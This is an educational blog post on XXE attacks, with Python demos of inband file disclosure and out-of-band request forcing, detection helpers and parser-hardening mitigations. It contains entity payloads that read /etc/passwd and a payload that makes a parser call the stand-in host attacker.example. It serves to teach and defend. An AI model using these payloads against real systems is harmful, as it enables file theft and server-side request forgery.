PDF, Excel, SVG, ebooks — all use XML. They can be vulnerable.


XML is one of the most widely used markup languages. It’s organized around tags, such as <example>foo</example>, and allows pretty complicated structures.

One interesting property of XML is that a document can reference external entities, e.g. it can include another file. That is where the name XXE comes from: XML external entities. Let’s start!

Why you should care

  • XXE vulnerabilities can allow attackers to steal your data, scan your internal network, and in some cases even execute code remotely (RCE)
  • XXE attacks were number 4 in the OWASP Top 10 of 2017 (A4:2017, XML External Entities)
  • The Twitter hashtag #XXE is pretty active, so people are still interested in it, although the vulnerability was first recognized back in 2002 (source)
  • 2012: An XXE vulnerability was discovered in Inkscape (source)
  • 2014: Google was vulnerable to XXE and paid a bug bounty of $10,000 (source)
  • 2014: Adobe Reader had an XXE vulnerability (source)
  • 2015: Mohamed Ramadan discovered an XXE vulnerability in Facebook’s resume upload (source)
  • 2020: IBM QRadar had an XXE vulnerability (source)

We don’t use XML!

Here are some indicators that you might need to care:

  • You’re using SOAP
  • You’re using SAML
  • You’re reading office files, such as Word (docx), Excel (xlsx; example, example), or PowerPoint (pptx). All of them are essentially ZIP archives with lots of XML files inside. I don’t think that Word, Excel, or PowerPoint themselves are vulnerable, but the smaller libraries that are used to create or read those files programmatically might be.
  • You’re reading XMP metadata from images such as JPG or GIF (presentation, slides), or metadata from audio and video files.
  • You’re reading PDF files
  • You’re processing SVGs, which are XML as well.

The oxml_xxe tool makes it pretty easy to generate a malicious file in one of these formats.
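To get a feeling for where a payload would sit inside an office file, here is a minimal sketch that opens a ZIP container and lists the XML parts that declare a DOCTYPE. It is only a heuristic under stated assumptions: the helper names find_doctype_parts and build_demo_docx are made up for this example, the "docx" is a tiny in-memory stand-in rather than a valid Word file, and a plain byte search would miss payloads in UTF-16 encoded parts.

```python
import io
import zipfile


def find_doctype_parts(archive_bytes):
    """Return the names of XML parts in a ZIP container that declare a DOCTYPE."""
    suspicious = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for name in archive.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue
            # Naive byte search: fine for a sketch, not a complete detector.
            if b"<!DOCTYPE" in archive.read(name):
                suspicious.append(name)
    return suspicious


def build_demo_docx(document_xml):
    """Build a tiny, hypothetical docx-like archive in memory."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("[Content_Types].xml", "<Types/>")
        archive.writestr("word/document.xml", document_xml)
    return buffer.getvalue()


clean = build_demo_docx("<document>Hello</document>")
malicious = build_demo_docx(
    '<!DOCTYPE d [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<document>&xxe;</document>"
)

print(find_doctype_parts(clean))      # []
print(find_doctype_parts(malicious))  # ['word/document.xml']
```

Flagging a DOCTYPE is a deliberately blunt choice: as far as I know, regular office documents have no need for one, so rejecting such files outright is usually cheaper than trying to decide whether a given entity is harmful.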

Types of XXEs

  • Inband: The output is shown to the attacker
  • Out of band (OOB): The attacker is blind, i.e. the parser output is never shown to them

Inband XXE

Consider a few lines of code that parse an XML string and print the result. Looks harmless, doesn’t it? It simply prints <root>Hello World!</root>

But if you change the XML string so that it declares an external entity pointing to a file, you can read the users’ passwords.
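The snippets that originally accompanied this section are not reproduced here, so the following is only a minimal sketch of the same idea and not the original code. It assumes Python’s standard-library xml.sax with external general entities switched on by hand (they are off by default since Python 3.7.1), and it uses a temporary file with made-up content as a stand-in for a real password file. The names TextCollector and parse_text are hypothetical.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects all character data the parser reports."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(xml_bytes, resolve_external):
    """Parse XML and return its text content."""
    parser = xml.sax.make_parser()
    # Assumption for the demo: the caller decides whether external general
    # entities are resolved. True recreates the vulnerable configuration.
    parser.setFeature(feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


# Stand-in for a sensitive file such as /etc/passwd (made-up content).
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as handle:
    handle.write("alice:s3cr3t")
    secret_path = handle.name

harmless = b"<root>Hello World!</root>"
payload = (
    '<!DOCTYPE root [<!ENTITY xxe SYSTEM "%s">]><root>&xxe;</root>' % secret_path
).encode("utf-8")

try:
    print(parse_text(harmless, resolve_external=True))  # Hello World!
    leaked = parse_text(payload, resolve_external=True)
    blocked = parse_text(payload, resolve_external=False)
finally:
    os.remove(secret_path)

print("with external entities:", repr(leaked))
print("without external entities:", repr(blocked))
```

The only difference between the harmless and the malicious input is the DOCTYPE with the entity declaration. Whether the file content ends up in the output depends entirely on the parser configuration, which is why the mitigations further down focus on the parser.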

If this were part of a server, an attacker could read any file on that server that the server process is allowed to read.

Out-of-Band XXE

Most of the time, the attacker cannot see the result of the parsed XML file directly, so inband XXE is not possible. Errors may be caught as well, in which case an error-based XXE does not work either.

However, the attacker might be able to force the server to make HTTP calls. This is called server-side request forgery (SSRF). The attacker sets up a listener, forces the server to make a request to it, and thus confirms that XXE is possible. The attack looks similar to the lines above and is pretty well explained here:
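Independent of that write-up, the request-forcing step can be sketched locally without touching the network. The example below again assumes xml.sax with external general entities enabled by hand. Instead of letting the parser fetch the URL, a hypothetical RecordingResolver only notes which address the parser asked for, which is exactly the signal an attacker’s listener would see. The host attacker.example and the helper requested_urls are made up for illustration.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource


class RecordingResolver(EntityResolver):
    """Records which external resources the parser asks for.

    A default resolver would fetch the URL. This stand-in only logs it and
    hands back an empty response, so the demo never opens a connection.
    """

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        empty = InputSource(systemId)
        empty.setByteStream(io.BytesIO(b""))  # pretend the response was empty
        return empty


def requested_urls(xml_bytes):
    """Parse XML and return the external resources the parser tried to load."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)  # deliberately unsafe
    resolver = RecordingResolver()
    parser.setEntityResolver(resolver)
    parser.setContentHandler(ContentHandler())
    parser.parse(io.BytesIO(xml_bytes))
    return resolver.requested


payload = (
    b'<!DOCTYPE root [<!ENTITY ping SYSTEM "http://attacker.example/xxe-ping">]>'
    b"<root>&ping;</root>"
)
print(requested_urls(payload))
```

Note that the attacker learns something even though the response body is empty and nothing is echoed back: the mere fact that the request arrives confirms that the parser resolves external entities.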

Mitigations

The simplest mitigation is to limit the capabilities of XML to a safe subset. That means restricting the XML parser you’re using, for example by disabling DTDs and external entities.

Python ships five XML modules in its standard library: sax, etree, minidom, pulldom, and xmlrpc. According to the documentation, none of them resolves external entities by default (xml.sax since Python 3.7.1), so they are safe against XXE. However, lxml is widespread. Its documentation mentions that you should configure the XML parser to not load external DTDs (source). The defusedxml package offers a way to access XML parsers with a secure default configuration.
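To illustrate what “a safe subset” can mean in practice, here is a minimal sketch that refuses any document containing a DOCTYPE declaration. It uses only the standard-library xml.parsers.expat module. It is written in the spirit of what defusedxml offers, but it is not defusedxml’s actual code, and the names DTDForbidden and parse_text_without_dtd are hypothetical.

```python
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def parse_text_without_dtd(xml_bytes):
    """Return the text content of xml_bytes, rejecting any DOCTYPE."""
    parser = xml.parsers.expat.ParserCreate()
    chunks = []

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        # Entities can only be declared inside a DTD, so stopping here
        # rules out external entities before any of them is declared.
        raise DTDForbidden("DOCTYPE declarations are not allowed: %r" % name)

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.CharacterDataHandler = chunks.append
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


print(parse_text_without_dtd(b"<root>Hello World!</root>"))  # Hello World!

payload = (
    b'<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<root>&xxe;</root>"
)
try:
    parse_text_without_dtd(payload)
except DTDForbidden as error:
    print("rejected:", error)
```

Rejecting the whole DTD is stricter than only disabling external entities, and it will also refuse legitimate documents that carry a DOCTYPE. For input that comes from untrusted users, that trade-off is usually acceptable.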

See also

I would like to point you to this YouTube video by PwnFunction. It summarizes the topic very well.

If you’re interested in a survey of different XML parsers, try SoK: XML Parser Vulnerabilities (2016) by Christopher Späth, Christian Mainka, Vladislav Mladenov, and Jörg Schwenk.

What’s next?

This series about application security (AppSec) has already covered some of the techniques of the attackers 😈 and also some techniques of the defenders 😇.

And this is about to come:

  • CSRF 😈
  • DoS 😈
  • Credential Stuffing 😈
  • Cryptojacking 😈
  • Single-Sign-On 😇
  • Two-Factor Authentication 😇
  • Backups 😇
  • Disk Encryption 😇

Let me know if you are interested in more articles around AppSec / InfoSec!


XXE attacks 😈 was originally published in FAUN on Medium, where people are continuing the conversation by highlighting and responding to this story.